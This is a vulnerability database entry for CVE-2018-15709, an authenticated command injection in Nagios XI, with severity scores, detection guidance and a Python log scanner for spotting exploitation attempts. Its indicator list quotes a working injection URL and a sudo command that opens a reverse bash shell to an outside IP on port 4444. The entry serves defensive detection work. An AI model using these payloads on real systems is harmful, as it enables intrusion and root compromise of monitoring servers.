cbcvebase.
CVE-2018-15709
published 2018-11-14

CVE-2018-15709: Nagios XI 5.5.6 allows remote authenticated attackers to execute arbitrary commands via a crafted HTTP request.

Priority: P2 · 64 · High
CVSS 3.0: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EPSS: 21.02% (97.3rd percentile)

Affected

1 range

Vendor   Product    Version range   Fixed in
nagios   nagios_xi  (not given)     (not given)

Detection & IOCs (extracted from sources)

path: /usr/local/nagiosxi/cron/cmdsubsys.php
url: https://192.168.1.208/nagiosxi/ajaxhelper.php?cmd=submitcommand&opts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22test%22,%22password%22:%22test%27%3bwhoami%20%3E%20/usr/local/nagiosxi/tmp/whoami.txt%3b%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=30a86418c0953be277b67c5149f9b4be762f08e14a92fcbece756922f5df2312
command: sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp/192.168.1.191/4444 0>&1;'
path: /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php
  • Monitor HTTP requests to /nagiosxi/ajaxhelper.php with cmd=submitcommand and cmd value 1100 (COMMAND_NAGIOSXI_SET_HTACCESS), particularly inspecting the 'password' field in the opts JSON body for shell metacharacters (e.g., single quotes, semicolons).
  • Alert on execution of cmdsubsys.php spawning unexpected child processes or shell commands, as the subsystem passes unsanitized input directly to system().
  • Detect sudo invocations of autodiscover_new.php by the 'apache' or 'nagios' users, especially with --addresses parameters containing shell injection characters (semicolons, redirects, /bin/bash).
  • Watch for outbound TCP connections from the Nagios XI server to unexpected external IPs on port 4444, indicative of a reverse bash shell established via the autodiscover_new.php LPE chain.
  • Flag creation of unexpected files under /usr/local/nagiosxi/tmp/ (e.g., whoami.txt) as evidence of successful command injection via cmdsubsys.php.
  • The vulnerability is exploitable by low-privileged (non-admin) authenticated users, not just administrators, broadening the attack surface beyond privileged accounts.
  • The sudoers configuration grants both the 'nagios' and 'apache' OS users passwordless sudo rights to autodiscover_new.php, meaning compromise of either user (e.g., via CVE-2018-15708 or CVE-2018-15709) is sufficient for full root escalation.
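A defender-side check for the first detection bullet above, added here as an example and not taken from the original page: it pulls the opts JSON out of ajaxhelper.php requests in constructed sample access-log lines and flags cmd 1100 submissions whose username or password carries shell metacharacters. The Apache-style log format and the SHELL_META character set are assumptions.

```python
import json
import re
from urllib.parse import urlsplit, parse_qs

SET_HTACCESS = 1100                      # COMMAND_NAGIOSXI_SET_HTACCESS, per the notes above
SHELL_META = re.compile(r"[;'`|&$<>]")   # assumed set: characters with no business in a credential
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def inspect_request(target):
    """Return the tainted field names for a cmd=submitcommand request whose
    cmd-1100 credentials contain shell metacharacters, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/nagiosxi/ajaxhelper.php"):
        return None
    qs = parse_qs(parts.query)           # also percent-decodes the values
    if qs.get("cmd", [""])[0] != "submitcommand":
        return None
    try:
        opts = json.loads(qs.get("opts", ["{}"])[0])
    except ValueError:
        return ["opts"]                  # malformed opts JSON is itself worth a look
    if not isinstance(opts, dict) or opts.get("cmd") != SET_HTACCESS:
        return None
    data = opts.get("cmddata") or {}
    tainted = [k for k in ("username", "password")
               if SHELL_META.search(str(data.get(k, "")))]
    return tainted or None

def scan_access_log(lines):
    """Return (line_number, client_ip, tainted_fields) for each suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        fields = inspect_request(m.group(1))
        if fields:
            hits.append((n, line.split(" ", 1)[0], fields))
    return hits

# Constructed sample log lines (not from the original page): a normal htaccess
# update, an injection attempt with a quote and semicolons, and an unrelated hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Nov/2018:10:00:01 +0000] "GET /nagiosxi/ajaxhelper.php?cmd=submitcommand&opts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22alice%22,%22password%22:%22Secret1%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=PLACEHOLDER HTTP/1.1" 200 51',
    '10.0.0.9 - - [14/Nov/2018:10:00:07 +0000] "GET /nagiosxi/ajaxhelper.php?cmd=submitcommand&opts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22test%22,%22password%22:%22test%27%3bid%3b%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=PLACEHOLDER HTTP/1.1" 200 51',
    '10.0.0.9 - - [14/Nov/2018:10:00:09 +0000] "GET /nagiosxi/index.php HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for n, ip, fields in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {ip} sent cmd 1100 with shell metacharacters in {fields}")
```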

CVSS provenance

NVD v3.0: 8.8 HIGH (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
NVD v2.0: 6.5 MEDIUM (AV:N/AC:L/Au:S/C:P/I:P/A:P)